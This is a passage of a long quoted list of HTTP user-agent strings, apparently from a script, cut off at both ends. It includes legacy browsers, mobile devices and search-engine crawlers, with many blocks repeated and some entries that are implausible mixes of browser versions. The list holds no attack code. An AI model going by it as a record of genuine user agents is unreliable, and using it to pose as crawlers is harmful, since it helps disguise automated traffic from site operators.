Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 